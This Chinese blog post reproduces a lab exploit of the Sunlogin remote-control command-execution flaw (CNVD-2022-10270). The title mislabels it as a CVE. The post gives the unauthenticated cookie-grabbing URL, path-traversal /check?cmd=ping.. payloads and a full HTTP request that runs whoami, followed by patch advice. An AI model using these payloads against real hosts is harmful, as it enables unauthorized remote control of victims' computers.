2025年最新CVE-2022-10270漏洞复现

已于 2025-04-16 20:24:32 修改
阅读量841 收藏 8
点赞数 12
分类专栏: CVE漏洞复现合集 文章标签: 网络 安全 web安全
于 2025-03-26 08:08:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_78851087/article/details/146518447
版权

一.漏洞描述

在向日葵远程控制软件 Windows 版本中存在命令执行漏洞(也曾被标记为 CNVD-2022-10270 )。远程攻击者在未授权情况下可通过构造特殊请求执行任意命令。

二.漏洞原理

当向日葵client在windows运行时,会连接远程Oray的服务器,开放对外接口,接口统一由sunlogin 处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check 处,当cmd的值为ping/nslookup开头时触发

向日葵在启动的时候会随机启动一个40000+高位端口,具体在 sub_140E0AAE8 可看到,随后载入IDA,对CID关键字进行搜索sub_140E20938、sub_140E1C954、sub_140E1A1F4,往上跟发现分别对应接口/cgi-bin/rpc 和 /cgi-bin/login.cgi ,其中在函数 sub_140E1C954 对应接口功能 /cgi-bin/rpc 中,传入如下参数即可在未授权的情况下获取到有效session,在知道被控端的验证码和识别码的情况下传入如下参数可获取到session。在知道主机的帐密的情况下通过 /cgi-bin/login.cgi 接口传入如下参数可获取到session 并返回设备的公网、内网地址等信息,该接口同时可用作暴力破解

在向日葵远程控制软件 Windows 版本的低版本中存在未授权访问漏洞。当用户打开旧版本的向日葵软件后,会开放未授权的端口,攻击者能够通过该端口在不需要密码的情况下获取 session(会话)。获取 session 后,攻击者可借助该会话,向特定接口(如 /check 处 )构造恶意请求。当请求参数中 cmd 的值以 ping 或者 nslookup 等开头时,就能构造命令实现远程命令执行,进而获取服务器权限。另外,也可通过向日葵客户端开放的 web 服务随机端口获取 Cookie CID,构造恶意请求执行命令以获取服务器控制权限 。

三.漏洞利用

首先我们下载有漏洞的版本

这个实验 我放在虚拟机里边使用

第一种复现方式 我们用下载的工具进行复现

我们在虚拟机里安装好之后

xrkRcePro -h 192.168.25.175 -t scan

xrkRcePro -h 192.168.25.175 -t rce -p 50065 -c "whoami"

这里没有复现成功

第二种方式 在网址输入

http://192.168.25.175:50065/

出现这个界面 就是有漏洞的

然后我们输入

http://192.168.25.175:50065/cgi-bin/rpc?action=verify-haras

获取cookie

Cookie: CID=0243aFf9X19BCrB9vrfSLludf4jc9lai(替换为自己的cookie)(这里我的cookie变了 是因为我刷新界面了)

这里的payload可以是

/check?cmd=ping..%26c:%26%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami

也可以是

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

我们进行抓包

GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami HTTP/1.1
Host: 192.168.25.175:50065
Cookie: CID=0243aFf9X19BCrB9vrfSLludf4jc9lai(替换为自己的cookie)
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0

运行成功

想了解更多看这个

向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现-云社区-华为云

四.影响版本

向日葵个人版 for Windows <= 11.0.0.33

向日葵简约版 <= V1.0.1.43315(2021.12)

五.修复建议

官方已发布修复该漏洞的新版本,受影响的用户可以前往向日葵官网(向日葵远程控制软件_远程控制电脑手机_远程桌面连接_远程办公|游戏|运维-贝锐向日葵官网 ),下载并安装最新版本的向日葵个人版软件(如 Windows 12.5.0.44227 及更新版本 ),及时更新以修复此高危安全漏洞。同时,相关单位也应迅速排查本单位及第三方供应商有关 “向日葵” 软件的使用情况,督促及时升级版本。此外,日常使用中还应加强网络运维管理,严格限制远程接入和安全审计,做好安全监测和应急处置准备。

向日葵漏洞复现(含批量验证poc)
weixin_43567873的博客
04-03 427
向日葵漏洞复现(含批量验证poc)
CVE-2022-26923 ADCS权限提升漏洞
总有人间一两风,填我十万八千梦
05-22 5081
CVE-2022-26923是一个影响微软Active Directory证书服务(AD CS)的权限提升漏洞
漏洞复现-向日葵
aming小老弟
06-14 1274
网络安全
向日葵rce漏洞复现
orange777
02-21 1350
漏洞描述 向日葵远程控制软件是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。监测到其存在远程命令执行漏洞。攻击者可构造特殊请求执行任意系统命令,获取服务器权限。 影响范围 向日葵 11.x 、10.x 漏洞复现 exp下载 https://github.com/Mr-xn/sunlogin_rce/releases/tag/new 向日葵版本10.3.0.27372 链接:https://pan.baidu.com/s/1QMOaytWbkoBd
复现CVE-2022-10270(向日葵远程代码执行漏洞
zz12345600354的博客
06-12 910
引言漏洞描述影响版本:原理:环境搭建手动复现脚本复现修复建议。
向日葵漏洞复现(含批量验证poc)(1),2024最新网络安全程序员怎么优雅迈过30K+这道坎
时间与思念
04-16 646
可以走的很快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
复现向日葵远程代码执行漏洞
weixin_53440207的博客
02-27 1794
复现向日葵远程代码执行漏洞
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
一只爱吃橙子的羊
03-31 7804
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现
王-哪跑的博客
02-27 4809
1.向日葵介绍 [向日葵远程控制]是一款提供远程控制服务的软件。其支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备。整个远控过程,可通过浏览器直接进行,无需再安装软件。 2.漏洞描述 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制
漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)
qq_53003652的博客
12-18 1332
SysAid On-premise 提供了诸如故障报告、资产管理、服务台支持、自动化流程等功能,以帮助 IT 团队更高效地工作。这种部署模式可以满足那些对数据安全性有更高要求的组织,同时也提供了更多的自定义和控制能力,以适应特定的业务需求和流程。该产品存在远程代码执行。
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6683
通过exp实现了对微软目前存在的office-word-2016的成功复现
漏洞学习篇:CVE漏洞复现
ZL_1618的博客
12-26 934
攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。可以看见,apache是49版本的。
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 5013
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Shiro721漏洞复现(自动化工具使用&&详细教程)
m0_52701599的博客
03-26 2095
Shiro721漏洞复现(自动化工具使用&&详细教程)
WSO2 文件上传 (CVE-2022-29464)漏洞复现
最新发布
09-24
WSO2 文件上传 (CVE-2022-29464) 漏洞是一种针对Web服务组件WSO2 Identity Server的安全问题。该漏洞源于身份服务器中的文件上传功能存在未经验证的处理,攻击者可以利用它上传恶意脚本或文件,进而可能导致远程代码执行(RCE)。复现这个漏洞通常需要以下几个步骤: 1. **环境准备**:首先,你需要安装受影响版本的WSO2 Identity Server,并确认其存在CVE-2022-29464漏洞,比如5.x或早期版本。 2. **找到上传点**:检查Identity Server的相关界面,如管理控制台,可能会有用户上传头像、证书等文件的功能,这就是潜在的漏洞入口。 3. **构造payload**:创建包含恶意代码的文件,例如PHP、JavaScript或者其他支持在服务器上执行的语言。代码应能触发服务器执行非安全的操作。 4. **尝试上传**:通过浏览器或者API工具(如curl)模拟用户上传动作,将含有恶意代码的文件作为普通文件提交。 5. **验证结果**:如果成功,你可能会看到一些异常日志,或者直接看到预期的恶意操作被执行的结果,比如服务器被控制了,数据被泄露等。 注意:进行漏洞复现时一定要遵守道德准则,避免对目标系统造成实际危害。同时,由于涉及敏感信息,建议在受控的环境中进行测试,并及时更新到安全修复版以防止真实攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值